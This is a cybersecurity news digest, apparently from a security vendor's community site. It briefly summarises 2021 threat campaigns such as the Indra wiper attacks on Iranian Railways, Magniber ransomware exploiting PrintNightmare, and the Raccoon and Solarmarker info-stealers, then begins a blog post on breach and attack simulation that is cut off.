Breaking industry news, cyber security resources, trends and more.
🚨An attack on the Iranian Railways 🚨News
Iranian Railways and the Ministry of Roads and Urban Development systems became the subject of targeted cyber attacks. Attacks heavily rely on the attacker's previous knowledge and reconnaissance of the targeted networks. The attacks on Iran were found to be tactically and technically similar to previous activity against multiple private companies in Syria which was carried at least since 2019. Analysts were able to tie this activity to a threat group that identify themselves as regime opposition group, named Indra. During these years, the attackers developed and deployed within victim's networks at least 3 different versions of the wiper dubbed Meteor, Stardust, and Comet. Judging by the quality of the tools, their modus operandi, and their presence on social media, we find it unlikely that Indra is operated by a nation-state actor.
🚨A New Phishing Campaign Discovered 🚨News
Anomali Threat Research discovered a spearphishing campaign that appears to have begun in early July 2021, targeting the manufacturing industry throughout Asia. The tactics, techniques, and procedures (TTPs) identified in this campaign align with the Aggah threat group. The analysis found multiple PowerPoint files that contained malicious macros that used MSHTA to execute a script utilizing PowerShell to load hex-encoded payloads. Based on the TTPs of this campaign, they assess with moderate confidence this is Aggah.
🚨Magniber ransomware is back🚨News
Magniber ransomware makes a comeback using the same methods: exploiting unpatched vulnerabilities on South Korean victims In July 2021, analysts identified Magniber ransomware attempting to use a known PrintNightmare vulnerability to compromise victims When the PrintNighmare (CVE-2021-34527) vulnerability was disclosed, analysts intelligence assessed the vulnerability will likely be used by threat actors as it allowed for possible remote code execution (RCE) and local privilege escalation (LPE). This assessment proved accurate in light of the recent events.
🚨A new variant of the eCh0raix ransomware 🚨News
A new variant of eCh0raix ransomware targeting Synology network-attached storage (NAS) and Quality Network Appliance Provider (QNAP) NAS devices. To achieve this, attackers are also leveraging CVE-2021-28799 to deliver the new eCh0raix ransomware variant to QNAP devices. While eCh0raix is known ransomware that has historically targeted QNAP and Synology NAS devices in separate campaigns, this new variant is the first time analysts've seen it combining functionality to target both QNAP and Synology NAS devices, demonstrating that some ransomware developers are continuing to invest in optimizing the tools used to target devices common in the small office and home office (SOHO).
🚨A Vulnerability Alert 🚨News
Juniper Threat Labs continuously monitors in-the-wild network traffic for malicious activity. Recently, they have discovered an active exploitation of a vulnerability that was disclosed days ago. CVE-2021-20090 is a vulnerability that was discovered by Tenable and made public. This vulnerability potentially affects millions of home routers (and other IOT devices using the same vulnerable code base) manufactured by no less than 17 vendors according to Tenable research, including some ISPs. The common thread between these devices seems to be firmware from Arcadyan.
🚨Raccon - a new info-stealer malware🚨News
Advertised as a 'Malware-as-a-Service' (MaaS) threat on various cybercriminal forums, Raccoon is an information stealer targeting victim credentials and cryptocurrency wallets. Seemingly favored by some threat actors due to its simplicity, the malware element of Raccoon omits advanced features, such as those used to evade detection, and instead focuses on the 'stealer' task in hand. Whilst this approach requires those deploying the threat to utilize third-party tools for evasion, such as cryptors or packers to thwart signature-based detection, the ongoing popularity and apparent success of Raccoon suggests that this has not been a problem for many. Lacking their own distribution method, recently observed Raccoon incidents appear to begin with the delivery of malicious document attachments sent via an indiscriminate unsolicited email (malspam) campaign. It is also reported that Raccoon malware has been dropped using third-party exploit kits and other malware families.
🚨 Solarmarker malware targets Healthcare and education sectors 🚨News
Healthcare and education sectors are the frequent targets of a new surge in credential harvesting activity from what's a "highly modular" .NET-based information stealer and keylogger, charting the course for the threat actor's continued evolution while simultaneously remaining under the radar. Dubbed "Solarmarker," the malware campaign is believed to be active since September 2020, with telemetry data pointing to malicious actions as early as April 2020, according to Cisco Talos. "At its core, the Solarmarker campaign appears to be conducted by a fairly sophisticated actor largely focused on credential and residual information theft," Talos researchers Andrew Windsor and Chris Neal said in a technical write-up published.
🚨 MountLocker ransomware new tactics 🚨
The MountLocker ransomware operation now uses enterprise Windows Active Directory APIs to worm through networks. MountLocker started operating in July 2020 as a Ransomware-as-a-Service (RaaS) where developers are in charge of programming the ransomware software and payment site, and affiliates are recruited to hack businesses and encrypt their devices. As part of this arrangement, the MountLocker core team receives a smaller cut of 20-30% of a ransom payment, while the affiliate gets the rest.
🚨 A new remote access trojan - ReverseRat🚨
Lumen's Black Lotus Labs detected a new remote access trojan - ReverseRat. Based on Lumen's global telemetry and analysis, the actor is targeting government and energy organizations in the South and Central Asia regions with operational infrastructure hosted in Pakistan. ReverseRat was deployed in parallel with an open-source RAT called AllaKore to infect machines and achieve persistence.
🚨 A new variant of the downloader JSSLoader was spotted 🚨
Proofpoint researchers observed a new variant of the downloader JSSLoader in several campaigns impacting a variety of organizations. This version of the malware loader was rewritten from .NET to the C++ programming language. This change, while not unheard of, is not a common occurrence and could be an effort by the threat actors utilizing JSSLoader to evade current detections. JSSLoader is often dropped in the first or second stage of a campaign and has the functionality to profile infected machines and load additional payloads.
Setting the Record Straight on Breach & Attack Simulation, Purple Teaming and Continuous Security Validation
As a twenty-plus year cybersecurity professional I can count on a single hand the times I had to respond to a vendor who made crazy, unsubstantiated claims. As practitioner in Breach and Attack Simulation (BAS) and Purple Teaming, I wanted to counter some really misleading “marketecture” that I heard another vendor make. I am going to take the high road and not call that vendor out by name and set the record straight by giving my experience with specifically the Cymulate Continuous Security Validation Platform that includes BAS and Purple Teaming solution. What is Cymulate Breach and Attack Simulation?BAS is using real world exploits and techniques along the entire kill chain to test enterprise environments real security controls, environments, and people. By doing such you get the most accurate picture of how the enterprise would respond to a real attack. Starting with reconnaissance these solutions moving onto mail, web, application reverse proxying and spear fishing techniques. Th
Already have an account? Login
LoginCUSTOMER / CYMULATE EMPLOYEE LOGIN
Login to the community
No account yet? Create an account
LoginCUSTOMER / CYMULATE EMPLOYEE LOGIN
Enter your username or e-mail address. We'll send you an e-mail with instructions to reset your password.